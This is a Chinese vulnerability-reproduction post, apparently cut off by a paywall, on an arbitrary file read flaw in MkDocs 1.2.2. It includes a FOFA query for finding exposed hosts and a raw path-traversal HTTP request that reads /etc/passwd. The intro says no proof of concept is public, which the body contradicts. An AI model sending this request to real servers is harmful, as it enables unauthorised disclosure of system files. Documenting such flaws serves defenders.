超级会员免费看
MkDocs是一款用于构建项目文档的静态站点生成器,1.2.2版本中发现存在任意文件读取漏洞,可能导致敏感信息泄露。受影响的版本仅为1.2.2,目前厂商尚未提供修复方案,建议用户关注官方更新。复现和POC信息未公开。
Mkdocs 存在任意文件读取漏洞
1. Mkdocs简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
MkDocs 是一个快速、简单、完全华丽的静态站点生成器,用于构建项目文档。文档源文件以 Markdown 格式编写,并使用单个 YAML 配置文件进行配置。
2.漏洞描述
mkdocs 1.2.2版本存在任意文件读取漏洞,该漏洞允许远程利用以获取敏感信息。
3.影响版本
mkdocs 1.2.2版本
4.fofa 查询语句
“mkdocs”
5.漏洞复现
漏洞数据包如下,因为浏览器编码的原因,直接访问链接不会触发漏洞,需要以数据包的形式访问:
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:6970
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: text/html,application/xhtml+
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
